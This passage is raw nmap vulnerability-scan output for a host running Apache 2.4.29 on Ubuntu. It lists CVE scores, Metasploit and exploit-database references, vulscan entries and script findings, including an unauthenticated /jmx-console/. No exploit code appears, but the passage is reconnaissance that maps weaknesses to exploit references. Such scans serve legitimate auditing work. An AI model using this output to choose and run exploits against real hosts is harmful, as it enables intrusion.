https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ EXPLOIT FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 EXPLOIT CVE-2022-22721 6.8 https://vulners.com/cve/CVE-2022-22721 CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 EXPLOIT 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 EXPLOIT 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B EXPLOIT CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ EXPLOIT CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1333/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1303/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ EXPLOIT CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 CVE-2022-30522 5.0 https://vulners.com/cve/CVE-2022-30522 CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189 CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303 CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ 4.9 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ EXPLOIT CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 MSF:ILITIES/UBUNTU-CVE-2018-1302/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1301/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ EXPLOIT CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302 CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301 CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D EXPLOIT 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 EXPLOIT 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ EXPLOIT CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 EXPLOIT
	http-server-header	Apache/2.4.29 (Ubuntu)
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-passwd	ERROR: Script execution failed (use -d to debug)
	http-vuln-cve2013-7091	ERROR: Script execution failed (use -d to debug)
	http-dombased-xss	Couldn't find any DOM based XSS.
	vulscan	VulDB - https://vuldb.com: [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge weak authentication [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache information disclosure [115059] Apache HTTP Server up to 2.4.29 HTTP2 denial of service [115058] Apache HTTP Server up to 2.4.29 memory corruption [115057] Apache HTTP Server up to 2.4.29 mod_session privilege escalation [115039] Apache HTTP Server up to 2.4.29 FilesMatch privilege escalation [159375] Apache HTTP Server 2.4.24 mod_remoteip/mod_rewrite IP Address weak authentication [114258] Apache HTTP Server up to 2.4.22 mod_cluster privilege escalation [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest privilege escalation [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption [94625] Apache HTTP Server up to 2.4.24 Response Split Data Processing Error [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c privilege escalation [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict privilege escalation [88667] Apache HTTP Server up to 2.4.20 mod_http2 privilege escalation [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors. [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies. [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow. SecurityFocus - https://www.securityfocus.com/bid/: [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability [15177] PHP Apache 2 Local Denial of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [5816] Apache 2 mod_dav Denial Of Service Vulnerability [5486] Apache 2.0 CGI Path Disclosure Vulnerability [5485] Apache 2.0 Path Disclosure Vulnerability [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [75211] Debian GNU/Linux apache 2 cross-site scripting Exploit-DB - https://www.exploit-db.com: [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability [27915] Apache James 2.2 SMTP Denial of Service Vulnerability [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability [21719] Apache 2.0 Path Disclosure Vulnerability [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities [17691] Apache Struts < 2.2.0 - Remote Command Execution [15319] Apache 2.2 (Windows) Local Denial of Service [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32) [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit [9] Apache HTTP Server 2.x Memory Leak Exploit OpenVAS (Nessus) - http://www.openvas.org: [855524] Solaris Update for Apache 2 120544-14 [855077] Solaris Update for Apache 2 120543-14 [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [72626] Debian Security Advisory DSA 2579-1 (apache2) [71551] Gentoo Security Advisory GLSA 201206-25 (apache) [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat) [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security) [71256] Debian Security Advisory DSA 2452-1 (apache2) [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid) [70724] Debian Security Advisory DSA 2405-1 (apache2) [70235] Debian Security Advisory DSA 2298-2 (apache2) [70233] Debian Security Advisory DSA 2298-1 (apache2) [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external) [69338] Debian Security Advisory DSA 2202-1 (apache2) [65131] SLES9: Security update for Apache 2 oes/CORE [64426] Gentoo Security Advisory GLSA 200907-04 (apache) [61381] Gentoo Security Advisory GLSA 200807-06 (apache) [60582] Gentoo Security Advisory GLSA 200803-19 (apache) [58745] Gentoo Security Advisory GLSA 200711-06 (apache) [57851] Gentoo Security Advisory GLSA 200608-01 (apache) [56246] Gentoo Security Advisory GLSA 200602-03 (Apache) [55392] Gentoo Security Advisory GLSA 200509-12 (Apache) [55129] Gentoo Security Advisory GLSA 200508-15 (apache) [54739] Gentoo Security Advisory GLSA 200411-18 (apache) [54724] Gentoo Security Advisory GLSA 200411-03 (apache) [54712] Gentoo Security Advisory GLSA 200410-21 (apache) [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache) [54677] Gentoo Security Advisory GLSA 200409-21 (apache) [54610] Gentoo Security Advisory GLSA 200407-03 (Apache) [54601] Gentoo Security Advisory GLSA 200406-16 (Apache) [54590] Gentoo Security Advisory GLSA 200406-05 (Apache) [54582] Gentoo Security Advisory GLSA 200405-22 (Apache) [54529] Gentoo Security Advisory GLSA 200403-04 (Apache) [54499] Gentoo Security Advisory GLSA 200310-04 (Apache) [54498] Gentoo Security Advisory GLSA 200310-03 (Apache) [11092] Apache 2.0.39 Win32 directory traversal [66081] SLES11: Security update for Apache 2 [66074] SLES10: Security update for Apache 2 [66070] SLES9: Security update for Apache 2 [65893] SLES10: Security update for Apache 2 [65888] SLES10: Security update for Apache 2 [65510] SLES9: Security update for Apache 2 [65249] SLES9: Security update for Apache 2 [65230] SLES9: Security update for Apache 2 [65228] SLES9: Security update for Apache 2 [65207] SLES9: Security update for Apache 2 [65136] SLES9: Security update for Apache 2 [65017] SLES9: Security update for Apache 2 SecurityTracker - https://www.securitytracker.com: [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users OSVDB - http://www.osvdb.org: [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
	http-csrf	Couldn't find any CSRF vulnerabilities.
443	tcp	open	http	syn-ack	Apache httpd	2.4.29	(Ubuntu)
	http-majordomo2-dir-traversal	ERROR: Script execution failed (use -d to debug)
	http-vuln-cve2010-0738	/jmx-console/: Authentication was not required
	http-server-header	Apache/2.4.29 (Ubuntu)
	vulscan	VulDB - https://vuldb.com: [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge weak authentication [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache information disclosure [115059] Apache HTTP Server up to 2.4.29 HTTP2 denial of service [115058] Apache HTTP Server up to 2.4.29 memory corruption [115057] Apache HTTP Server up to 2.4.29 mod_session privilege escalation [115039] Apache HTTP Server up to 2.4.29 FilesMatch privilege escalation [159375] Apache HTTP Server 2.4.24 mod_remoteip/mod_rewrite IP Address weak authentication [114258] Apache HTTP Server up to 2.4.22 mod_cluster privilege escalation [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest privilege escalation [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption [94625] Apache HTTP Server up to 2.4.24 Response Split Data Processing Error [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c privilege escalation [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict privilege escalation [88667] Apache HTTP Server up to 2.4.20 mod_http2 privilege escalation [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors. [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies. [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow. SecurityFocus - https://www.securityfocus.com/bid/: [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability [15177] PHP Apache 2 Local Denial of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [5816] Apache 2 mod_dav Denial Of Service Vulnerability [5486] Apache 2.0 CGI Path Disclosure Vulnerability [5485] Apache 2.0 Path Disclosure Vulnerability [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [75211] Debian GNU/Linux apache 2 cross-site scripting Exploit-DB - https://www.exploit-db.com: [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability [27915] Apache James 2.2 SMTP Denial of Service Vulnerability [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability [21719] Apache 2.0 Path Disclosure Vulnerability [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities [17691] Apache Struts < 2.2.0 - Remote Command Execution [15319] Apache 2.2 (Windows) Local Denial of Service [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32) [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit [9] Apache HTTP Server 2.x Memory Leak Exploit OpenVAS (Nessus) 